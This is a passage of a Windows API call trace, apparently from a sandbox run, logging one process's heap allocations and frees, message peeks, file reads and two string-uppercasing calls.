Size=0x38) returned 0x2a5e980 [0152.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0152.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cda020 [0152.013] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0152.013] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0152.016] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x75f2, lpOverlapped=0x0) returned 1 [0152.017] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0152.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x175f2) returned 0x2aaf410 [0152.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cda020 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x175f2) returned 0x2ac6a10 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x175f2) returned 0x2aaf410 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0152.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0152.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0152.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0152.026] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x175f2) returned 0x2aaf410 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa090 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0152.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0152.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x175f2) returned 0x37c0048 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0152.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0152.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0152.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0152.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0152.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0152.029] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0152.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0152.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0152.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0152.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0152.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0152.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0152.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0152.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0152.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 